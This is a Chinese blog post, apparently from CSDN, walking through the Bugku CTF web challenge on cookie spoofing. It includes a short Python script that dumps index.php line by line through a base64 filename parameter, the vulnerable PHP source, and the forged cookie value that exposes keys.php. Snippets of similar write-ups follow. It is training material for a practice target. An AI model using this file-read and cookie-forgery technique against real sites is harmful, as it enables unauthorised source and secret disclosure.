bugku cookies欺骗

最新推荐文章于 2021-08-10 21:32:29 发布
最新推荐文章于 2021-08-10 21:32:29 发布
阅读量140 收藏
点赞数 1
文章标签: ctf bugku web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/PRCORANGE/article/details/115678698
版权

题目:
在这里插入图片描述
发现url中line没有值,filename为base64编码,转码为key.txt
将line的值填入,并将index.php的的base64编码填入
在这里插入图片描述
貌似是网页源码,使用脚本读取

import requests
a=30
for i in range(a):
    url="http://120.24.86.145:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw" 
    s=requests.get(url)
    print s.text

获得源码

<?php
 
error_reporting(0);
 
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
 
$line=isset($_GET['line'])?intval($_GET['line']):0;
 
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
 
$file_list = array(
 
'0' =>'keys.txt',
 
'1' =>'index.php',
 
);
 
 
 
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){       //看这里
 
$file_list[2]='keys.php';
 
}
 
 
 
if(in_array($file, $file_list)){
 
$fa = file($file);
 
echo $fa[$line];
 
}
 
?>

当cookie的margin=margin时,可以访问一个keys.php文件(注意改filename的值为keys.php的base64)
在这里插入图片描述

PRCORANGE
关注
Bugku——cookies欺骗
Dig_的博客
09-22 1125
URL的中的base64解码为keys.txt。 猜测文件名都是以base64的方式使用的。 key.txt的内容有些不明所以,干脆去索引页面(index.php)看看源码。 index.php用base64加密后替换key.txt的base64,页面存在却有内容,查看源码发现只有&amp;amp;lt;?php ,说明源码需要加参数遍历。 发现给参数line一个个传入值才有源码,写脚本遍历出源码 import...
伪造cookies --bugku 23cookies欺骗
s11show_163的博客
11-28 723
首先抬头看url发现有点儿类似sql注入,结尾base64解码后发现是key.txt于是根据经验先试一试如果是index.php会怎么样,前面的line=显然也可以传参数进去,于是写一个脚本如下: import requests import base64 r = requests.session() for i in range(30): url="http://123.206.87.240...
cookie欺骗bugku
hhh
09-06 2446
利用cookie值进行攻击; 完全有一点经验,看到这个提示,我唯一能想到的就是用burpsuite抓包后修改一下cookie值,也许会有些什么东西;可是抓包后完全无从下手…… 然后有有发现这道题的url跟其他的有些不一样呢?后面有一串很奇怪的参数,这熟悉的“=”,应该是base64编码,拿去解码一下:原来是&amp;fillename=key.txt; 另外url里还有一个参数:line...
cookie欺骗bugku)
weixin_46396711的博客
04-28 1278
解题思路: 打开链接,发现是一串无意义的字符串 观察url,发现filename的值为base64编码格式,解码为keys.txt,line应该表示行,基于此,可通过改变line的值并将filename值改为index.php(记得转为base64格式),查看该文件的代码。 当line=1时 当line=2时 可通过python脚本将该文件内容打印出来 import requests a=25 #表示index.php文件的代码行数 for i in range(a): url="http:/
bugku——cookie欺骗
吃肉唐僧的博客
09-02 352
打开题目地址,一串不懂的重复的字符串 一眼就看出这个filename后面的是base64加密的字符,解密出来时keys.txt 后来访问keys.txt,发现还是这些重复的字符 后来试着将index.php也base64加密试下,而且变动line会有显示文件源码行数内容 写个脚本把他全部拿下来 前30行,代码如下 <?php error_reporting(0);...
cookies欺骗bugku-web
小白的劝退之路
04-30 310
BugKuCTF中套路满满的题-------Cookie欺骗
qq_42133828的博客
12-19 2355
这一题,首先看题目,Cookie欺骗,那么什么是Cookie欺骗呢?      看了网上的一些博客后,我想可以总结一句话就是: 你在火狐成功登陆了一个账号,并且把session_id记录下来,转而去其他浏览器登陆此账号,但此时的登陆不需要密码和账号,只需要把Session_id传给服务器,便可成功登陆  好了,话不多说,直接上。。。      首先,界面给出的是一串字符,当我想并有什么用...
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
bugku CTF Web-20-cookies欺骗
weixin_47387913的博客
04-14 352
Web-20-cookies欺骗 一、尝试 提交flag的时候又忘记截图了,直接描述一下吧。 给出的网站进入后是一串不知道什么东西的代码,也不像什么加密,直接使用,但是网站进入后网址后面出现了一串编码,base64解密。 发现是读取的keys.txt里面的内容,改变line的值为1或0均相同,改变为2时无内容出现,说明无第二行内容。 直接尝试读取index.php里的内容 与keys.txt相同,把filename改为index.php,同样base64...
BugKucookies 欺骗
wssmiss的博客
03-25 1523
题目链接 http://123.206.87.240:8002/web11/ 查看源码后有可用信息 观察url发现参数filename的值加密了 解密后filename=keys.txt 尝试用修改参数filename的值为index.php(注意此处要用base64加密为aW5kZXgucGhw) 发现参数line有给值,随意赋值如3,出现 写脚本抓原代码,先试一下有多少行,100,50...
BugKu -- cookies欺骗
热门推荐
小水池
08-11 1万+
cookies欺骗         100 http://120.24.86.145:8002/web11/ 答案格式:KEY{xxxxxxxx}  解题思路: 打开链接是一串有意义的字符串,查看源码有发现什么 观察url ,发现 a2V5cy50eHQ= 是一个base64编码,解码后是keys.txt http://120.24.86.145:8002/web11/i...
web——cookies欺骗(100)——Bugku
Zichel77的博客
08-09 313
0×00 靶场链接 http://123.206.87.240:8002/web11/ 0×01 题目描述 0×02 解题过程 cookies欺骗,就是在只对用户做cookies验证的系统中,通过修改cookies的内容来得到相应的用户权限登录 点开链接是一段看不出什么的字符 URL:123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 然后发现filename是一个base64编码,解码一下 .
BugkuCTFWeb--cookies欺骗
VZZmieshenquan的博客
02-10 1600
Description: http://123.206.87.240:8002/web11/ 答案格式:KEY{xxxxxxxx} Solution: 打开网页,发现URL有一段Base64URL解码得keys.txt,试了一些方法之后,将index.php也Base64编码了一下,尝试用filename读取index.php发现出现了php的第一行,所以这里我选择用python遍历ind...
[CTF]Bugku cookies欺骗
第八个男人
08-10 351
https://ctf.bugku.com/challenges/detail/id/87.html 打开网页是一串乱码,源代码也是乱码,查看Response也有特别信息,题目提到的cookie里面也是空内容。 从题目的链接入手,http://114.67.246.176:14576/index.php?line=&filename=a2V5cy50eHQ= filename后面带的这串经过base64解密后是keys.txt,所以这一段就是可以修改的,我们把这串改成题目中的网页index.
bugkuweb20 cookies欺骗
EC_Carrot的博客
12-17 410
题目 进入题目看到url http://114.67.246.176:17939/index.php?line=&filename=a2V5cy50eHQ= 很熟眼,line功能应该就是行数,filename就是base64加密后的文件,放进get读取文件 试试读index.php 可以读,换下行数也可以读出来剩下的,但我选择用脚本 import requests def fun(num): session = requests.Session() headers = {"Ac
bugku cookie欺骗(python解)
Superpig的博客
11-11 511
思路 1、打开页面后,观察url中有两个参数,其中filename的参数是一个base64编码,解码得keys.txt 2、为了得到源码,传入index.php的base64,得到&amp;amp;amp;lt;?php,修改line的值为1,得error_reporting(0);,可以判断是按行读取,因此,写个脚本得到整个代码 运行结果如下: 分析源码得,当cookie 的margin属性的值为margin而且f...
bugkucookies欺骗 writeup
perye
02-27 3003
看到url上的参数有base64,解码发现是keys.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- import requests s=requests.Session() url='http://120.24.86.145:8002/web11/in...
Bugku——cookie欺骗
csu_vc的博客
10-28 8424
看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- # @Date : 2017-10-28 09:36:41 # @Author : csu_vc # @Link : http://blog.c
JavaScript Cookies详解与经典操作
在JavaScript中,Cookies是一种小型文本数据,常用于Web应用程序中保存用户信息或网站状态。cookies由浏览器管理,存储在用户的设备上,但受限于特定的格式和大小。以下是关于如何在JavaScript中使用Cookies的一些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值